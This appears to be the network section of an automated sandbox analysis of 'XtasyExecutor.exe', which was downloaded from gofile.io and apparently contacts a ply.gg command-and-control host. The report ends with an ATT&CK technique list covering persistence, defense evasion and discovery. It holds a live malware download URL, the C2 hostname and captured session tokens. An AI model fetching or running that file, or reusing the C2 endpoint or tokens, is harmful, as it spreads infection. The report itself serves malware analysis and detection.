203.197.79.204.in-addr.arpa

Remote address:

8.8.8.8:53

Request

203.197.79.204.in-addr.arpa

IN PTR

Response

203.197.79.204.in-addr.arpa

IN PTR

a-0003a-msedgenet
DNS

186.244.140.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

186.244.140.51.in-addr.arpa

IN PTR

Response
DNS

store2.gofile.io

msedge.exe

Remote address:

8.8.8.8:53

Request

store2.gofile.io

IN A

Response

store2.gofile.io

IN A

45.112.123.239
GET

https://store2.gofile.io/download/web/aa306a81-df2b-4c89-bfc2-c702607abb9d/XtasyExecutor.exe

msedge.exe

Remote address:

45.112.123.239:443

Request

GET /download/web/aa306a81-df2b-4c89-bfc2-c702607abb9d/XtasyExecutor.exe HTTP/2.0
host: store2.gofile.io
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: same-site
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
referer: https://gofile.io/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: accountToken=JkRhayJOGMo94C5Hr0iFEitkBv1kOqRF

Response

HTTP/2.0 200

server: nginx/1.27.1
date: Tue, 17 Dec 2024 18:11:38 GMT
content-type: application/x-ms-dos-executable
content-length: 207360
accept-ranges: bytes
access-control-allow-headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization
access-control-allow-methods: POST, GET, OPTIONS, PUT, DELETE
access-control-allow-origin: *
access-control-expose-headers: Cache-Control, Content-Encoding, Content-Range
content-disposition: attachment; filename*=UTF-8''XtasyExecutor.exe
last-modified: Tue, 17 Dec 2024 18:11:11 GMT
DNS

239.123.112.45.in-addr.arpa

Remote address:

8.8.8.8:53

Request

239.123.112.45.in-addr.arpa

IN PTR

Response
DNS

science-attract.gl.at.ply.gg

XtasyExecutor.exe

Remote address:

8.8.8.8:53

Request

science-attract.gl.at.ply.gg

IN A

Response

science-attract.gl.at.ply.gg

IN A

147.185.221.24
DNS

24.221.185.147.in-addr.arpa

Remote address:

8.8.8.8:53

Request

24.221.185.147.in-addr.arpa

IN PTR

Response
DNS

fd.api.iris.microsoft.com

Remote address:

8.8.8.8:53

Request

fd.api.iris.microsoft.com

IN A

Response

fd.api.iris.microsoft.com

IN CNAME

fd-api-iris.trafficmanager.net

fd-api-iris.trafficmanager.net

IN CNAME

iris-de-prod-azsc-v2-frc.francecentral.cloudapp.azure.com

iris-de-prod-azsc-v2-frc.francecentral.cloudapp.azure.com

IN A

20.199.58.43
GET

https://fd.api.iris.microsoft.com/v4/api/selection?&asid=79DD55644AEA4374A2618DC895EB5B72&nct=1&placement=88000677&bcnt=30&country=US&locale=en-US&poptin=0&fmt=json&clr=cdmlite&arch=AMD64&concp=0&d3dfl=D3D_FEATURE_LEVEL_12_1&devfam=Windows.Desktop&devosver=10.0.19044.4529&dinst=1733929060&dmret=0&drgng=244&flightbranch=&flightring=Retail&localid=w%3A50ACBC7D-7476-6380-3B6C-0B9AD8F9FA09&osbranch=vb_release&oslocale=en-US&osret=1&ossku=EnterpriseS&osskuid=125&prccn=2&prccs=4192&prcmf=AuthenticAMD&procm=Intel%20Core%20Processor%20%28Broadwell%29&ram=4095&tinst=Client&tl=1&pat=0&smc=0&sac=0&disphorzres=1280&dispsize=14.7&dispvertres=720&ldisphorzres=1280&ldispvertres=720&moncnt=1&cpdsk=241361&frdsk=20469&lo=8833&tsu=8833

Remote address:

20.199.58.43:443

Request

GET /v4/api/selection?&asid=79DD55644AEA4374A2618DC895EB5B72&nct=1&placement=88000677&bcnt=30&country=US&locale=en-US&poptin=0&fmt=json&clr=cdmlite&arch=AMD64&concp=0&d3dfl=D3D_FEATURE_LEVEL_12_1&devfam=Windows.Desktop&devosver=10.0.19044.4529&dinst=1733929060&dmret=0&drgng=244&flightbranch=&flightring=Retail&localid=w%3A50ACBC7D-7476-6380-3B6C-0B9AD8F9FA09&osbranch=vb_release&oslocale=en-US&osret=1&ossku=EnterpriseS&osskuid=125&prccn=2&prccs=4192&prcmf=AuthenticAMD&procm=Intel%20Core%20Processor%20%28Broadwell%29&ram=4095&tinst=Client&tl=1&pat=0&smc=0&sac=0&disphorzres=1280&dispsize=14.7&dispvertres=720&ldisphorzres=1280&ldispvertres=720&moncnt=1&cpdsk=241361&frdsk=20469&lo=8833&tsu=8833 HTTP/2.0
host: fd.api.iris.microsoft.com
accept-encoding: gzip, deflate
x-sdk-hw-token: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAbGXNaSLANyQiMEnuUcfntfr0Vj2Aj29omYZHEz5J4ol6j4TvtvFWlwoRy/wJw9DeogRFAZSpOOl76+so6Ljycfyg5K/PxeWNLn981lH624bFXJwyb2qdiXCWwdMSYwmb/j/61cLvCAwsmOydcHHrSFLroDoXdkbexhl6D5VUaoQ0H0X9m0/Y52Q52sesiocr9k1ujdR9lcx3I5zG5vDB/qO3aqHoeTNXDKk1gW0lWZlT1ISVBub7kDdEqmvUVpSruSLCv+OH0xwRDcnkM5gKWLzhUumEih7m3pWE+6kYfpYsWXKz5FhD1DsptpVpYQf56yJHUbifXkBe8NtRL/aTF4QZgAAEPAL+sPtdhBeG3641XY5f2SwAUyASjMCCScqiojcxhhJely5fjfVvgPqO87A9yPuXPLXa5DFMILeikdKOIqExikob2cnlIN4S67ih5IBNtEj6I2mDbT0hBTYuOATTNaYoVlPXvgNRMVq53i0+dr+Ncb8UyK3/Yd+okt9shjISfZVN/7ixqON+2rA7tzxTMjfoS9A2oFPgyxzpvKTAmrnr5nOIdUuyU1lqNcGWOMIkawIPLBj//fRE8MQzR6IMGcbBSrm43PusopMtTT9BJS/E8rDcgvatBnsSPyy0cp330M3m7U6taFuIwshv7V2AoTeud4zZMRVrkplzw8N0CZbdonIFJuPyDbZgHAoTG6XszqFGDwbAOTxznYIeypDi1BGUEvLcSZ6g6N2/TgEca7uRh6HfjH7d2JacfRWJdz642qKd1aEOjpjbLD1k+8w6QKoyYD1QcZkxlnury8TrmF8nLjTzmQwWTcVhVS3OxlLLBQJmOpaEPDCfsNO+YMy5BuanRHn1737DeRg1K7+hKuwm4grrBjEHRcxS5zMbO6PvSPwe7SM1Wz5IJ3Ah830oh4P9jR/lWmJWXGZ/r++kyt9jJEt1toB&p=

Response

HTTP/2.0 200

cache-control: no-store, no-cache
pragma: no-cache
content-length: 131
content-type: application/json; charset=utf-8
expires: Mon, 01 Jan 0001 00:00:00 GMT
server: Microsoft-IIS/10.0
arc-rsp-dbg: [{"DcoPlusDebug":"Status: Ok"},{"OPTOUTSTATE":"256"},{"REGIONALPOLICY":"0"}]
accept-ch: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version
x-aspnet-version: 4.0.30319
x-powered-by: ASP.NET
strict-transport-security: max-age=31536000; includeSubDomains
date: Tue, 17 Dec 2024 18:12:04 GMT
DNS

53.210.109.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

53.210.109.20.in-addr.arpa

IN PTR

Response
DNS

43.58.199.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

43.58.199.20.in-addr.arpa

IN PTR

Response
DNS

15.164.165.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

15.164.165.52.in-addr.arpa

IN PTR

Response
DNS

15.164.165.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

15.164.165.52.in-addr.arpa

IN PTR
DNS

checkappexec.microsoft.com

Remote address:

8.8.8.8:53

Request

checkappexec.microsoft.com

IN A

Response

checkappexec.microsoft.com

IN CNAME

prod-atm-wds-apprep.trafficmanager.net

prod-atm-wds-apprep.trafficmanager.net

IN CNAME

prod-agic-uw-2.ukwest.cloudapp.azure.com

prod-agic-uw-2.ukwest.cloudapp.azure.com

IN A

51.140.244.186
POST

https://checkappexec.microsoft.com/windows/shell/actions

Remote address:

51.140.244.186:443

Request

POST /windows/shell/actions HTTP/2.0
host: checkappexec.microsoft.com
accept-encoding: gzip, deflate
user-agent: SmartScreen/2814751014982010
authorization: SmartScreenHash eyJhdXRoSWQiOiJhZGZmZjVhZC1lZjllLTQzYTYtYjFhMy0yYWQ0MjY3YWVlZDUiLCJoYXNoIjoiY1Ayam5GM3BIUEU9Iiwia2V5IjoiMVh1bm9BNGpRNmdEVkFhWTIyYy84Zz09In0=
content-length: 1162
content-type: application/json; charset=utf-8
cache-control: no-cache

Response

HTTP/2.0 200

date: Tue, 17 Dec 2024 18:12:38 GMT
content-type: application/json; charset=utf-8
content-length: 183
server: Kestrel
cache-control: max-age=0, private
request-context: appId=cid-v1:365e21c6-df19-4b1c-a612-b572489ace31

45.112.123.126:443

https://gofile.io/contents/filemanager.html

tls, http2

msedge.exe

11.2kB
431.0kB
198
332

HTTP Request

GET https://gofile.io/d/Dmq7NE

HTTP Response

200

HTTP Request

GET https://gofile.io/dist/css/output.css

HTTP Request

GET https://gofile.io/plugins/fontawesome/css/all.min.css

HTTP Request

GET https://gofile.io/dist/js/global.js

HTTP Request

GET https://gofile.io/dist/js/framework.js

HTTP Request

GET https://gofile.io/dist/js/blockies.min.js

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://gofile.io/dist/img/logo-small-70.png

HTTP Response

200

HTTP Request

GET https://gofile.io/plugins/fontawesome/webfonts/fa-solid-900.woff2

HTTP Request

GET https://gofile.io/plugins/fontawesome/webfonts/fa-brands-400.woff2

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://gofile.io/dist/img/favicon32.png

HTTP Response

200

HTTP Request

GET https://gofile.io/contents/filemanager.html

HTTP Response

200
51.75.242.210:443

https://s.gofile.io/js/script.js

tls, http2

msedge.exe

2.1kB
6.2kB
13
15

HTTP Request

GET https://s.gofile.io/js/script.js

HTTP Response

200
45.112.123.126:443

https://api.gofile.io/contents/Dmq7NE?wt=4fd6sg89d7s6&contentFilter=&page=1&pageSize=1000&sortField=name&sortDirection=1

tls, http2

msedge.exe

2.4kB
10.3kB
19
20

HTTP Request

POST https://api.gofile.io/accounts

HTTP Response

200

HTTP Request

OPTIONS https://api.gofile.io/accounts/website

HTTP Response

200

HTTP Request

GET https://api.gofile.io/accounts/website

HTTP Response

200

HTTP Request

OPTIONS https://api.gofile.io/contents/Dmq7NE?wt=4fd6sg89d7s6&contentFilter=&page=1&pageSize=1000&sortField=name&sortDirection=1

HTTP Response

200

HTTP Request

GET https://api.gofile.io/contents/Dmq7NE?wt=4fd6sg89d7s6&contentFilter=&page=1&pageSize=1000&sortField=name&sortDirection=1

HTTP Response

200
51.140.242.104:443

https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

tls, http

msedge.exe

7.2kB
10.6kB
19
15

HTTP Request

POST https://nav.smartscreen.microsoft.com/api/browser/edge/actions

HTTP Response

200

HTTP Request

POST https://nav.smartscreen.microsoft.com/api/browser/edge/download/2

HTTP Response

200

HTTP Request

POST https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

HTTP Response

200
51.140.242.104:443

https://nav.smartscreen.microsoft.com/api/browser/edge/downloadcomplete/1

tls, http

msedge.exe

7.4kB
11.2kB
20
17

HTTP Request

POST https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

HTTP Response

200

HTTP Request

POST https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

HTTP Response

200

HTTP Request

POST https://nav.smartscreen.microsoft.com/api/browser/edge/downloadcomplete/1

HTTP Response

200
51.75.242.210:443

https://s.gofile.io/api/event

tls, http2

msedge.exe

2.4kB
4.9kB
15
15

HTTP Request

POST https://s.gofile.io/api/event

HTTP Response

202
51.140.244.186:443

https://data-edge.smartscreen.microsoft.com/windows/browser/edge/data/toptraffic?pushCert=false&os=10.0.19044.4529.vb_release

tls, http

msedge.exe

14.1kB
486.3kB
254
354

HTTP Request

GET https://data-edge.smartscreen.microsoft.com/windows/browser/edge/data/toptraffic?pushCert=false&os=10.0.19044.4529.vb_release

HTTP Response

200
51.140.244.186:443

https://data-edge.smartscreen.microsoft.com/windows/browser/edge/data/toptraffic?pushCert=false&os=10.0.19044.4529.vb_release

tls, http

msedge.exe

5.3kB
140.7kB
60
108

HTTP Request

POST https://data-edge.smartscreen.microsoft.com/api/browser/edge/data/settings

HTTP Response

200

HTTP Request

GET https://data-edge.smartscreen.microsoft.com/windows/browser/edge/data/toptraffic?pushCert=false&os=10.0.19044.4529.vb_release

HTTP Response

304
51.140.244.186:443

https://data-edge.smartscreen.microsoft.com/api/browser/edge/data/settings

tls, http

msedge.exe

6.6kB
144.7kB
74
110

HTTP Request

GET https://data-edge.smartscreen.microsoft.com/windows/browser/edge/data/bloomfilter/x?pushCert=false&os=10.0.19044.4529.vb_release

HTTP Response

200

HTTP Request

GET https://data-edge.smartscreen.microsoft.com/windows/browser/edge/data/bloomfilter/x?pushCert=false&os=10.0.19044.4529.vb_release

HTTP Response

304

HTTP Request

POST https://data-edge.smartscreen.microsoft.com/api/browser/edge/data/settings

HTTP Response

200
45.112.123.239:443

https://store2.gofile.io/download/web/aa306a81-df2b-4c89-bfc2-c702607abb9d/XtasyExecutor.exe

tls, http2

msedge.exe

8.2kB
221.7kB
138
167

HTTP Request

GET https://store2.gofile.io/download/web/aa306a81-df2b-4c89-bfc2-c702607abb9d/XtasyExecutor.exe

HTTP Response

200
45.112.123.239:443

store2.gofile.io

tls

msedge.exe

989 B
4.6kB
9
9
147.185.221.24:13548

science-attract.gl.at.ply.gg

XtasyExecutor.exe

11.4kB
373.7kB
223
325
20.199.58.43:443

https://fd.api.iris.microsoft.com/v4/api/selection?&asid=79DD55644AEA4374A2618DC895EB5B72&nct=1&placement=88000677&bcnt=30&country=US&locale=en-US&poptin=0&fmt=json&clr=cdmlite&arch=AMD64&concp=0&d3dfl=D3D_FEATURE_LEVEL_12_1&devfam=Windows.Desktop&devosver=10.0.19044.4529&dinst=1733929060&dmret=0&drgng=244&flightbranch=&flightring=Retail&localid=w%3A50ACBC7D-7476-6380-3B6C-0B9AD8F9FA09&osbranch=vb_release&oslocale=en-US&osret=1&ossku=EnterpriseS&osskuid=125&prccn=2&prccs=4192&prcmf=AuthenticAMD&procm=Intel%20Core%20Processor%20%28Broadwell%29&ram=4095&tinst=Client&tl=1&pat=0&smc=0&sac=0&disphorzres=1280&dispsize=14.7&dispvertres=720&ldisphorzres=1280&ldispvertres=720&moncnt=1&cpdsk=241361&frdsk=20469&lo=8833&tsu=8833

tls, http2

2.6kB
7.5kB
17
13

HTTP Request

GET https://fd.api.iris.microsoft.com/v4/api/selection?&asid=79DD55644AEA4374A2618DC895EB5B72&nct=1&placement=88000677&bcnt=30&country=US&locale=en-US&poptin=0&fmt=json&clr=cdmlite&arch=AMD64&concp=0&d3dfl=D3D_FEATURE_LEVEL_12_1&devfam=Windows.Desktop&devosver=10.0.19044.4529&dinst=1733929060&dmret=0&drgng=244&flightbranch=&flightring=Retail&localid=w%3A50ACBC7D-7476-6380-3B6C-0B9AD8F9FA09&osbranch=vb_release&oslocale=en-US&osret=1&ossku=EnterpriseS&osskuid=125&prccn=2&prccs=4192&prcmf=AuthenticAMD&procm=Intel%20Core%20Processor%20%28Broadwell%29&ram=4095&tinst=Client&tl=1&pat=0&smc=0&sac=0&disphorzres=1280&dispsize=14.7&dispvertres=720&ldisphorzres=1280&ldispvertres=720&moncnt=1&cpdsk=241361&frdsk=20469&lo=8833&tsu=8833

HTTP Response

200
51.140.244.186:443

https://checkappexec.microsoft.com/windows/shell/actions

tls, http2

2.8kB
7.6kB
20
14

HTTP Request

POST https://checkappexec.microsoft.com/windows/shell/actions

HTTP Response

200

8.8.8.8:53

gofile.io

dns

msedge.exe

55 B
71 B
1
1

DNS Request

gofile.io

DNS Response

45.112.123.126
8.8.8.8:53

8.8.8.8.in-addr.arpa

dns

66 B
90 B
1
1

DNS Request

8.8.8.8.in-addr.arpa
8.8.8.8:53

136.32.126.40.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

136.32.126.40.in-addr.arpa
8.8.8.8:53

126.123.112.45.in-addr.arpa

dns

73 B
127 B
1
1

DNS Request

126.123.112.45.in-addr.arpa
8.8.8.8:53

83.210.23.2.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

83.210.23.2.in-addr.arpa
8.8.8.8:53

s.gofile.io

dns

msedge.exe

57 B
73 B
1
1

DNS Request

s.gofile.io

DNS Response

51.75.242.210
8.8.8.8:53

api.gofile.io

dns

msedge.exe

59 B
75 B
1
1

DNS Request

api.gofile.io

DNS Response

45.112.123.126
8.8.8.8:53

nav.smartscreen.microsoft.com

dns

msedge.exe

75 B
191 B
1
1

DNS Request

nav.smartscreen.microsoft.com

DNS Response

51.140.242.104
8.8.8.8:53

data-edge.smartscreen.microsoft.com

dns

msedge.exe

81 B
198 B
1
1

DNS Request

data-edge.smartscreen.microsoft.com

DNS Response

51.140.244.186
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

210.242.75.51.in-addr.arpa

dns

72 B
100 B
1
1

DNS Request

210.242.75.51.in-addr.arpa
8.8.8.8:53

104.242.140.51.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

104.242.140.51.in-addr.arpa
8.8.8.8:53

203.197.79.204.in-addr.arpa

dns

73 B
106 B
1
1

DNS Request

203.197.79.204.in-addr.arpa
8.8.8.8:53

186.244.140.51.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

186.244.140.51.in-addr.arpa
8.8.8.8:53

store2.gofile.io

dns

msedge.exe

62 B
78 B
1
1

DNS Request

store2.gofile.io

DNS Response

45.112.123.239
8.8.8.8:53

239.123.112.45.in-addr.arpa

dns

73 B
127 B
1
1

DNS Request

239.123.112.45.in-addr.arpa
224.0.0.251:5353

578 B
9
8.8.8.8:53

science-attract.gl.at.ply.gg

dns

XtasyExecutor.exe

74 B
90 B
1
1

DNS Request

science-attract.gl.at.ply.gg

DNS Response

147.185.221.24
8.8.8.8:53

24.221.185.147.in-addr.arpa

dns

73 B
130 B
1
1

DNS Request

24.221.185.147.in-addr.arpa
8.8.8.8:53

fd.api.iris.microsoft.com

dns

71 B
199 B
1
1

DNS Request

fd.api.iris.microsoft.com

DNS Response

20.199.58.43
8.8.8.8:53

53.210.109.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

53.210.109.20.in-addr.arpa
8.8.8.8:53

43.58.199.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

43.58.199.20.in-addr.arpa
8.8.8.8:53

15.164.165.52.in-addr.arpa

dns

144 B
146 B
2
1

DNS Request

15.164.165.52.in-addr.arpa

DNS Request

15.164.165.52.in-addr.arpa
8.8.8.8:53

checkappexec.microsoft.com

dns

72 B
191 B
1
1

DNS Request

checkappexec.microsoft.com

DNS Response

51.140.244.186

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

Credential Access

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery